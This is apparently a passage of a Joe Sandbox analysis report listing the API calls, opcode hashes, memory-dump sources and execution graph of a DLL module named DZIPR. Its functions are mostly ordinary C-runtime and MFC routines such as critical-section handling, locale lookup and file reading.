                                          • Part of subcall function 6FE28BDF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FE28C2D
                                          • Part of subcall function 6FE28BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FE28C69
                                          • Part of subcall function 6FE28BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FE28C77
                                          • Part of subcall function 6FE28BDF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FE28C94
                                          • Part of subcall function 6FE28BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FE28CBF
                                          • Part of subcall function 6FE28BDF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FE28CC8
                                          • Part of subcall function 6FE28BDF: GetModuleFileNameW.KERNEL32(6FE20000,?,00000105), ref: 6FE28D7F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                                        • String ID: %s%s.dll
                                        • API String ID: 1311856149-1649984862
                                        • Opcode ID: 4c2d58cd9cf153a0ca06a3cd221c2d31389cdf641cafd31cf9fb77ae2dd9121f
                                        • Instruction ID: aaeae8beb4dbc6ca5b22ccc3a91bfabc4b57dbc11135cbc296b809eba306b219
                                        • Opcode Fuzzy Hash: 4c2d58cd9cf153a0ca06a3cd221c2d31389cdf641cafd31cf9fb77ae2dd9121f
                                        • Instruction Fuzzy Hash: 7A01A771A05518ABCB05DF68DC459EFBBF9BF4A314F11046BA506E7140E670DB05CB90
                                        APIs
                                          • Part of subcall function 6FE35017: __getptd.LIBCMT ref: 6FE3501D
                                          • Part of subcall function 6FE35017: __getptd.LIBCMT ref: 6FE3502D
                                        • __getptd.LIBCMT ref: 6FE3C54B
                                          • Part of subcall function 6FE3A27F: __getptd_noexit.LIBCMT ref: 6FE3A282
                                          • Part of subcall function 6FE3A27F: __amsg_exit.LIBCMT ref: 6FE3A28F
                                        • __getptd.LIBCMT ref: 6FE3C559
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                        • String ID: csm
                                        • API String ID: 803148776-1018135373
                                        • Opcode ID: f8cc2f09cc03d4c7c6e467d980a2c87cccd186c913e22614bc70be444f49effe
                                        • Instruction ID: fec9954aa439a2d7619a20997f36e8ee10862e3e622510f685081fbffe2be97e
                                        • Opcode Fuzzy Hash: f8cc2f09cc03d4c7c6e467d980a2c87cccd186c913e22614bc70be444f49effe
                                        • Instruction Fuzzy Hash: 57011676E04335AACF248E68D4486AEBFF5AF10319F74442ED4529A790DB32E680DF41
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID: Po$xPo
                                        • API String ID: 431132790-3544800484
                                        • Opcode ID: fcb5e5f9621299b8e67a7befae0370184c9e91025cf6186b2cef199643ae8591
                                        • Instruction ID: 70934e4e0d6816ea86e6611915a097f5c77aa56e905876ebdd9bd8aafe53f8a4
                                        • Opcode Fuzzy Hash: fcb5e5f9621299b8e67a7befae0370184c9e91025cf6186b2cef199643ae8591
                                        • Instruction Fuzzy Hash: BBF0AD73F023318BDF64AB6A89493ADBEA06B0431DF30164ED2A54B2D0C375A840C682
                                        APIs
                                        • _memset.LIBCMT ref: 6FE27318
                                        • PathStripToRootW.SHLWAPI(00000000,00000104,00000000,00000104,?,6FE27540,00000000,?), ref: 6FE2732D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: PathRootStrip_memset
                                        • String ID: @uo
                                        • API String ID: 2213896960-1137737743
                                        • Opcode ID: 465b4581f0f7cd2a7c722edc4faa9762cec182679c155bbd13a38c20875ae2a9
                                        • Instruction ID: d6a7fdbf344a3447d870c1cc9b60c5ad946f89285812e44d66aaccf116ba60f8
                                        • Opcode Fuzzy Hash: 465b4581f0f7cd2a7c722edc4faa9762cec182679c155bbd13a38c20875ae2a9
                                        • Instruction Fuzzy Hash: 21E0D83710422437C60066998C44EEF3F9D8FC7774F204219F938572D09F34651186B5
                                        APIs
                                        • EnterCriticalSection.KERNEL32(?), ref: 6FE2BFBC
                                        • LeaveCriticalSection.KERNEL32(?), ref: 6FE2BFCC
                                        • LocalFree.KERNEL32(?), ref: 6FE2BFD5
                                        • TlsSetValue.KERNEL32(?,00000000), ref: 6FE2BFE7
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                        • String ID:
                                        • API String ID: 2949335588-0
                                        • Opcode ID: c1362ca6dc7c1ae899c5b12aa2ca0b7b0a496148958c399a8660a3d15a5524eb
                                        • Instruction ID: ac4aece6454974f4458b80f9a6dbdb99699dfdb77c964eee584bd277c3335031
                                        • Opcode Fuzzy Hash: c1362ca6dc7c1ae899c5b12aa2ca0b7b0a496148958c399a8660a3d15a5524eb
                                        • Instruction Fuzzy Hash: 2C116731A00A04EFE714DF54C884F9ABBA5FF46329F20842EF1528B6A1DB71BA51CF50
                                        APIs
                                        • EnterCriticalSection.KERNEL32(6FE534A8,?,?,?,?,6FE2BB27,00000010,00000008,6FE2AF1F,6FE2AEC2,6FE26DDD,6FE2A591,6FE22BC2,?,?,?), ref: 6FE2C25A
                                        • InitializeCriticalSection.KERNEL32(-000071A8,?,?,?,6FE2BB27,00000010,00000008,6FE2AF1F,6FE2AEC2,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?), ref: 6FE2C26C
                                        • LeaveCriticalSection.KERNEL32(6FE534A8,?,?,?,6FE2BB27,00000010,00000008,6FE2AF1F,6FE2AEC2,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?), ref: 6FE2C279
                                        • EnterCriticalSection.KERNEL32(-000071A8,?,?,?,?,6FE2BB27,00000010,00000008,6FE2AF1F,6FE2AEC2,6FE26DDD,6FE2A591,6FE22BC2,?,?,?), ref: 6FE2C289
                                          • Part of subcall function 6FE26DC1: __CxxThrowException@8.LIBCMT ref: 6FE26DD7
                                          • Part of subcall function 6FE26DC1: __EH_prolog3.LIBCMT ref: 6FE26DE4
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                        • String ID:
                                        • API String ID: 2895727460-0
                                        • Opcode ID: 252d75f1eeec4baa02fdbf8dc08ea8d332e00dc091942ff379438f9ca22b758c
                                        • Instruction ID: e9a7e84e1767ca67cd903f77076776e5344573d2c744198ff23d44d2f2647e96
                                        • Opcode Fuzzy Hash: 252d75f1eeec4baa02fdbf8dc08ea8d332e00dc091942ff379438f9ca22b758c
                                        • Instruction Fuzzy Hash: 84F06873604514AFDA055A98DC467157FABEBD3335F31001BE25887241DF31D5A5C9A1
                                        APIs
                                        • EnterCriticalSection.KERNEL32(6FE532EC,?,?,?,?,6FE2C0B7,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?), ref: 6FE2BA69
                                        • TlsGetValue.KERNEL32(6FE532D0,?,?,?,6FE2C0B7,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?,?), ref: 6FE2BA7D
                                        • LeaveCriticalSection.KERNEL32(6FE532EC,?,?,?,6FE2C0B7,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?,?), ref: 6FE2BA93
                                        • LeaveCriticalSection.KERNEL32(6FE532EC,?,?,?,6FE2C0B7,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?,?), ref: 6FE2BA9E
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Leave$EnterValue
                                        • String ID:
                                        • API String ID: 3969253408-0
                                        • Opcode ID: 57bf96cf5fa022f4b007c9649e924d63fe9c354a6bac88add4fa7b37b74cd872
                                        • Instruction ID: f906f38df281d313b3e3325b209a609e693d52a0cb0457eaec1739610a4d39e8
                                        • Opcode Fuzzy Hash: 57bf96cf5fa022f4b007c9649e924d63fe9c354a6bac88add4fa7b37b74cd872
                                        • Instruction Fuzzy Hash: 07F030B6604A049FD7209F58C888C4A7BE9FF86374725445BE65993201E630F856DFA0

                                        Execution Graph

                                        Execution Coverage:2.8%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0%
                                        Total number of Nodes:1673
                                        Total number of Limit Nodes:29
                                        execution_graph 17813 6c91aef1 17818 6c91c050 17813->17818 17815 6c91af00 17816 6c91af23 17815->17816 17829 6c91bb0c 17815->17829 17820 6c91c05c __EH_prolog3 17818->17820 17821 6c91c0aa 17820->17821 17835 6c91bd66 TlsAlloc 17820->17835 17839 6c91bc4e RtlEnterCriticalSection 17820->17839 17853 6c916dc1 17820->17853 17858 6c91ba5b RtlEnterCriticalSection 17821->17858 17826 6c91c0d0 ctype 17826->17815 17827 6c91c0bd 17865 6c91be0d 17827->17865 17830 6c91bb18 __EH_prolog3_catch 17829->17830 17831 6c91bb41 ctype 17830->17831 17907 6c91c220 17830->17907 17831->17815 17833 6c91bb27 17917 6c91c292 17833->17917 17836 6c91bd92 17835->17836 17837 6c91bd97 RtlInitializeCriticalSection 17835->17837 17887 6c916d89 17836->17887 17837->17820 17840 6c91bc71 17839->17840 17842 6c91bcaa ctype 17840->17842 17843 6c91bcbf GlobalHandle GlobalUnlock 17840->17843 17849 6c91bd30 _memset 17840->17849 17841 6c91bd47 RtlLeaveCriticalSection 17841->17820 17845 6c91bcb2 GlobalAlloc 17842->17845 17893 6c9169d7 17843->17893 17847 6c91bce9 17845->17847 17846 6c91bcdd GlobalReAlloc 17846->17847 17848 6c91bd10 GlobalLock 17847->17848 17850 6c91bd02 RtlLeaveCriticalSection 17847->17850 17851 6c91bcf4 GlobalHandle GlobalLock 17847->17851 17848->17849 17849->17841 17852 6c916d89 ctype RaiseException 17850->17852 17851->17850 17852->17848 17854 6c92527b __CxxThrowException@8 RaiseException 17853->17854 17855 6c916ddc __EH_prolog3 17854->17855 17895 6c91ba28 LocalAlloc 17855->17895 17857 6c916df3 ctype 17857->17820 17859 6c91ba76 17858->17859 17860 6c91ba9d RtlLeaveCriticalSection 17858->17860 17859->17860 17861 6c91ba7b TlsGetValue 17859->17861 17862 6c91baa6 17860->17862 17861->17860 17863 6c91ba87 17861->17863 17862->17826 17862->17827 17863->17860 17864 6c91ba8c RtlLeaveCriticalSection 17863->17864 17864->17862 17899 6c9250fc 17865->17899 17867 6c91be19 RtlEnterCriticalSection 17868 6c91be38 17867->17868 17873 6c91bf1c RtlLeaveCriticalSection 17867->17873 17870 6c91be41 TlsGetValue 17868->17870 17868->17873 17871 6c91be7f 17870->17871 17882 6c91be4f 17870->17882 17874 6c91ba28 ctype 2 API calls 17871->17874 17872 6c91bf3f ctype 17872->17826 17873->17872 17875 6c91be89 17874->17875 17900 6c91bbbf 17875->17900 17876 6c91bec4 ctype 17878 6c91bed0 LocalReAlloc 17876->17878 17877 6c91be69 ctype 17880 6c91be73 LocalAlloc 17877->17880 17881 6c91bedc 17878->17881 17880->17881 17883 6c91bee0 RtlLeaveCriticalSection 17881->17883 17885 6c91beee _memset 17881->17885 17882->17873 17882->17876 17882->17877 17884 6c916d89 ctype RaiseException 17883->17884 17884->17885 17886 6c91bf07 TlsSetValue 17885->17886 17886->17873 17890 6c92527b 17887->17890 17889 6c916da4 17891 6c9252b0 RaiseException 17890->17891 17892 6c9252a4 17890->17892 17891->17889 17892->17891 17894 6c9169ec ctype 17893->17894 17894->17846 17896 6c91ba41 17895->17896 17897 6c91ba3c 17895->17897 17896->17857 17898 6c916d89 ctype RaiseException 17897->17898 17898->17896 17899->17867 17903 6c91bba5 17900->17903 17904 6c91bbb0 17903->17904 17905 6c91bbb5 17903->17905 17906 6c916dc1 ctype 2 API calls 17904->17906 17905->17882 17906->17905 17908 6c91c230 17907->17908 17909 6c91c235 17907->17909 17911 6c916dc1 ctype 2 API calls 17908->17911 17910 6c91c243 17909->17910 17921 6c91c1b7 17909->17921 17913 6c91c255 RtlEnterCriticalSection 17910->17913 17914 6c91c27f RtlEnterCriticalSection 17910->17914 17911->17909 17915 6c91c261 RtlInitializeCriticalSection 17913->17915 17916 6c91c274 RtlLeaveCriticalSection 17913->17916 17914->17833 17915->17916 17916->17914 17918 6c91c2a4 RtlLeaveCriticalSection 17917->17918 17919 6c91c29f 17917->17919 17918->17831 17920 6c916dc1 ctype 2 API calls 17919->17920 17920->17918 17922 6c91c1c0 RtlInitializeCriticalSection 17921->17922 17923 6c91c1d5 17921->17923 17922->17923 17923->17910 17924 6c9139b0 17925 6c9139ee 17924->17925 17958 6c911990 17925->17958 17927 6c913a0a 17964 6c912370 17927->17964 17929 6c913a69 17994 6c911a10 17929->17994 17931 6c913b12 17932 6c913b77 17931->17932 17933 6c913b16 17931->17933 17934 6c913b81 17932->17934 17935 6c913c3b 17932->17935 17968 6c911000 17933->17968 18030 6c913090 17934->18030 18062 6c912c10 17935->18062 17940 6c913b8c 18039 6c9131f0 17940->18039 17941 6c913c49 18072 6c9115f0 17941->18072 17948 6c913b4c ctype 18025 6c917202 17948->18025 17951 6c913b65 18081 6c915590 17951->18081 17959 6c9119b4 17958->17959 18097 6c9168e2 17959->18097 17962 6c9168e2 ctype 67 API calls 17963 6c9119e7 17962->17963 17963->17927 17965 6c91239f 17964->17965 18473 6c9114a0 17965->18473 17967 6c91240f 17967->17929 17969 6c91102d 17968->17969 17970 6c9131f0 102 API calls 17969->17970 17971 6c911068 17970->17971 17972 6c9115f0 67 API calls 17971->17972 17973 6c911077 17972->17973 17974 6c913e60 17973->17974 18509 6c923d6c 17974->18509 17976 6c914443 17977 6c9168e2 ctype 67 API calls 17976->17977 17979 6c914460 17977->17979 17978 6c913b35 18001 6c915070 17978->18001 17980 6c92527b __CxxThrowException@8 RaiseException 17979->17980 17981 6c9144ae 17980->17981 17982 6c916dc1 ctype 2 API calls 17981->17982 17982->17978 17984 6c9168e2 ctype 67 API calls 17989 6c913ea7 _memset 17984->17989 17988 6c91afc3 69 API calls 17988->17989 17989->17976 17989->17978 17989->17981 17989->17984 17989->17988 17993 6c9140fd 17989->17993 18519 6c915ca0 17989->18519 18532 6c916160 17989->18532 18537 6c91b1ec 17989->18537 17992 6c916750 ReadFile 17992->17993 17993->17989 17993->17992 18543 6c915e70 17993->18543 18549 6c916230 17993->18549 18554 6c9163f0 17993->18554 18582 6c91764f 17994->18582 17996 6c911a59 18000 6c911af7 17996->18000 18597 6c9172fd 17996->18597 17998 6c911ab1 GetDiskFreeSpaceW 17998->18000 18000->17931 18003 6c9150a6 18001->18003 18002 6c91525a 18004 6c9153de 18002->18004 18006 6c9153e3 18002->18006 18011 6c9152bf 18002->18011 18738 6c9145f0 18002->18738 18003->18002 18003->18004 18007 6c91538f 18003->18007 18022 6c9131f0 102 API calls 18003->18022 18023 6c912600 101 API calls 18003->18023 18684 6c914880 18003->18684 18704 6c914ac0 18003->18704 18727 6c9162d0 18003->18727 18732 6c915490 18003->18732 18005 6c916dc1 ctype 2 API calls 18004->18005 18005->18006 18009 6c9168e2 ctype 67 API calls 18006->18009 18010 6c9168e2 ctype 67 API calls 18007->18010 18015 6c9153ea 18009->18015 18017 6c915396 18010->18017 18742 6c9147d0 18011->18742 18016 6c92527b __CxxThrowException@8 RaiseException 18015->18016 18019 6c915432 18016->18019 18018 6c92527b __CxxThrowException@8 RaiseException 18017->18018 18018->18004 18021 6c91530c 18021->17948 18022->18003 18023->18003 18026 6c917220 ctype 18025->18026 18027 6c917212 CloseHandle 18025->18027 18028 6c917244 ctype 18026->18028 18029 6c917236 GetLastError 18026->18029 18027->18026 18028->17951 18029->18028 18874 6c912f60 18030->18874 18032 6c91309f 18033 6c9130a7 18032->18033 18034 6c9130bc 18032->18034 18888 6c913370 18033->18888 18896 6c911580 18034->18896 18037 6c9130c7 18037->17940 18038 6c9130b8 18038->17940 18040 6c913222 18039->18040 18041 6c91aef1 ctype 31 API calls 18040->18041 18042 6c913254 18041->18042 18905 6c9133f0 FindResourceExW 18042->18905 18044 6c913268 18045 6c91326c 18044->18045 18047 6c91aef1 ctype 31 API calls 18044->18047 18046 6c911580 67 API calls 18045->18046 18056 6c913279 18046->18056 18048 6c9132bf 18047->18048 18049 6c9133f0 71 API calls 18048->18049 18050 6c9132d3 18049->18050 18051 6c9132d7 18050->18051 18052 6c913308 18050->18052 18053 6c911580 67 API calls 18051->18053 18054 6c91a58c 31 API calls 18052->18054 18053->18056 18055 6c91330e 18054->18055 18055->18045 18057 6c913325 18055->18057 18059 6c912600 18056->18059 18058 6c912b50 98 API calls 18057->18058 18058->18056 18919 6c911240 18059->18919 18061 6c912613 18061->17951 18063 6c912c51 18062->18063 18064 6c9131f0 102 API calls 18063->18064 18070 6c912cc0 18063->18070 18066 6c912cad 18064->18066 18065 6c9131f0 102 API calls 18067 6c912cf9 18065->18067 18068 6c9244cb 67 API calls 18066->18068 18069 6c912600 101 API calls 18067->18069 18068->18070 18071 6c912d0b ctype 18069->18071 18070->18065 18071->17941 18073 6c911606 18072->18073 18074 6c91165a 18072->18074 18075 6c911646 18073->18075 18077 6c911616 18073->18077 18074->17951 18076 6c9114a0 67 API calls 18075->18076 18078 6c911652 18076->18078 18079 6c911580 67 API calls 18077->18079 18078->17951 18080 6c91161d 18079->18080 18080->17951 18082 6c9155bb 18081->18082 18086 6c913d8b 18081->18086 18083 6c9131f0 102 API calls 18082->18083 18082->18086 18084 6c9155d1 18083->18084 18085 6c912600 101 API calls 18084->18085 18085->18086 18087 6c912490 18086->18087 18088 6c9124d1 ctype 18087->18088 19188 6c917343 18088->19188 18098 6c9168ea 18097->18098 18100 6c9119be 18098->18100 18101 6c9249fe 18098->18101 18100->17962 18102 6c924a10 18101->18102 18103 6c924ab1 18101->18103 18110 6c924a6d RtlAllocateHeap 18102->18110 18112 6c924a9d 18102->18112 18115 6c924aa2 18102->18115 18117 6c924aa9 18102->18117 18118 6c92c046 18102->18118 18127 6c92be9b 18102->18127 18161 6c925c53 18102->18161 18164 6c9249af 18102->18164 18172 6c92c08e 18102->18172 18104 6c92c08e _malloc 6 API calls 18103->18104 18105 6c924ab7 18104->18105 18106 6c925348 __strnicoll_l 66 API calls 18105->18106 18106->18117 18110->18102 18175 6c925348 18112->18175 18116 6c925348 __strnicoll_l 66 API calls 18115->18116 18116->18117 18117->18098 18178 6c930cfc 18118->18178 18121 6c92c05a 18123 6c92be9b __NMSG_WRITE 67 API calls 18121->18123 18126 6c92c07c 18121->18126 18122 6c930cfc __set_error_mode 67 API calls 18122->18121 18124 6c92c072 18123->18124 18125 6c92be9b __NMSG_WRITE 67 API calls 18124->18125 18125->18126 18126->18102 18128 6c92beaf 18127->18128 18129 6c92c00a 18128->18129 18130 6c930cfc __set_error_mode 64 API calls 18128->18130 18129->18102 18131 6c92bed1 18130->18131 18132 6c92c00f GetStdHandle 18131->18132 18134 6c930cfc __set_error_mode 64 API calls 18131->18134 18132->18129 18133 6c92c01d _strlen 18132->18133 18133->18129 18137 6c92c036 WriteFile 18133->18137 18135 6c92bee2 18134->18135 18135->18132 18136 6c92bef4 18135->18136 18136->18129 18201 6c930997 18136->18201 18137->18129 18140 6c92bf2a GetModuleFileNameA 18142 6c92bf48 18140->18142 18147 6c92bf6b _strlen 18140->18147 18144 6c930997 _strcpy_s 64 API calls 18142->18144 18145 6c92bf58 18144->18145 18145->18147 18148 6c928034 __invoke_watson 10 API calls 18145->18148 18146 6c92bfae 18226 6c930bd3 18146->18226 18147->18146 18217 6c930c47 18147->18217 18148->18147 18153 6c92bfd2 18154 6c930bd3 _strcat_s 64 API calls 18153->18154 18156 6c92bfe6 18154->18156 18155 6c928034 __invoke_watson 10 API calls 18155->18153 18158 6c92bff7 18156->18158 18159 6c928034 __invoke_watson 10 API calls 18156->18159 18157 6c928034 __invoke_watson 10 API calls 18157->18146 18235 6c930a6a 18158->18235 18159->18158 18286 6c925c28 GetModuleHandleW 18161->18286 18165 6c9249bb __mtinitlocknum 18164->18165 18166 6c9249ec __mtinitlocknum 18165->18166 18289 6c92a914 18165->18289 18166->18102 18168 6c9249d1 18296 6c92b126 18168->18296 18173 6c92a033 __decode_pointer 6 API calls 18172->18173 18174 6c92c09e 18173->18174 18174->18102 18392 6c92a206 GetLastError 18175->18392 18177 6c92534d 18177->18115 18179 6c930d0b 18178->18179 18180 6c92c04d 18179->18180 18181 6c925348 __strnicoll_l 67 API calls 18179->18181 18180->18121 18180->18122 18182 6c930d2e 18181->18182 18184 6c92815c 18182->18184 18187 6c92a033 TlsGetValue 18184->18187 18186 6c92816c __invoke_watson 18188 6c92a04b 18187->18188 18189 6c92a06c GetModuleHandleW 18187->18189 18188->18189 18190 6c92a055 TlsGetValue 18188->18190 18191 6c92a087 GetProcAddress 18189->18191 18192 6c92a07c 18189->18192 18194 6c92a060 18190->18194 18196 6c92a064 18191->18196 18197 6c925bcf 18192->18197 18194->18189 18194->18196 18196->18186 18198 6c925bda Sleep GetModuleHandleW 18197->18198 18199 6c925bf8 18198->18199 18200 6c925bfc 18198->18200 18199->18198 18199->18200 18200->18191 18200->18196 18202 6c9309a8 18201->18202 18203 6c9309af 18201->18203 18202->18203 18208 6c9309d5 18202->18208 18204 6c925348 __strnicoll_l 67 API calls 18203->18204 18205 6c9309b4 18204->18205 18206 6c92815c __strnicoll_l 6 API calls 18205->18206 18207 6c92bf16 18206->18207 18207->18140 18210 6c928034 18207->18210 18208->18207 18209 6c925348 __strnicoll_l 67 API calls 18208->18209 18209->18205 18262 6c9255b0 18210->18262 18212 6c928061 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18213 6c928131 __invoke_watson 18212->18213 18214 6c92813d GetCurrentProcess TerminateProcess 18212->18214 18213->18214 18264 6c923f34 18214->18264 18216 6c92815a 18216->18140 18221 6c930c59 18217->18221 18218 6c930c5d 18219 6c92bf9b 18218->18219 18220 6c925348 __strnicoll_l 67 API calls 18218->18220 18219->18146 18219->18157 18222 6c930c79 18220->18222 18221->18218 18221->18219 18224 6c930ca3 18221->18224 18223 6c92815c __strnicoll_l 6 API calls 18222->18223 18223->18219 18224->18219 18225 6c925348 __strnicoll_l 67 API calls 18224->18225 18225->18222 18227 6c930beb 18226->18227 18230 6c930be4 18226->18230 18228 6c925348 __strnicoll_l 67 API calls 18227->18228 18229 6c930bf0 18228->18229 18231 6c92815c __strnicoll_l 6 API calls 18229->18231 18230->18227 18233 6c930c1f 18230->18233 18232 6c92bfc1 18231->18232 18232->18153 18232->18155 18233->18232 18234 6c925348 __strnicoll_l 67 API calls 18233->18234 18234->18229 18273 6c92a02a 18235->18273 18238 6c930b15 18246 6c92a033 __decode_pointer 6 API calls 18238->18246 18257 6c930b3f 18238->18257 18239 6c930a8d LoadLibraryA 18240 6c930aa2 GetProcAddress 18239->18240 18241 6c930bb7 18239->18241 18240->18241 18243 6c930ab8 18240->18243 18241->18129 18242 6c930b6a 18244 6c92a033 __decode_pointer 6 API calls 18242->18244 18276 6c929fb8 TlsGetValue 18243->18276 18244->18241 18245 6c92a033 __decode_pointer 6 API calls 18256 6c930b82 18245->18256 18248 6c930b32 18246->18248 18250 6c92a033 __decode_pointer 6 API calls 18248->18250 18250->18257 18251 6c929fb8 __encode_pointer 6 API calls 18252 6c930ad3 GetProcAddress 18251->18252 18253 6c929fb8 __encode_pointer 6 API calls 18252->18253 18254 6c930ae8 GetProcAddress 18253->18254 18255 6c929fb8 __encode_pointer 6 API calls 18254->18255 18258 6c930afd 18255->18258 18256->18242 18259 6c92a033 __decode_pointer 6 API calls 18256->18259 18257->18242 18257->18245 18258->18238 18260 6c930b07 GetProcAddress 18258->18260 18259->18242 18261 6c929fb8 __encode_pointer 6 API calls 18260->18261 18261->18238 18263 6c9255bc __VEC_memzero 18262->18263 18263->18212 18265 6c923f3e IsDebuggerPresent 18264->18265 18266 6c923f3c 18264->18266 18272 6c92ee35 18265->18272 18266->18216 18269 6c927c7e SetUnhandledExceptionFilter UnhandledExceptionFilter 18270 6c927ca3 GetCurrentProcess TerminateProcess 18269->18270 18271 6c927c9b __invoke_watson 18269->18271 18270->18216 18271->18270 18272->18269 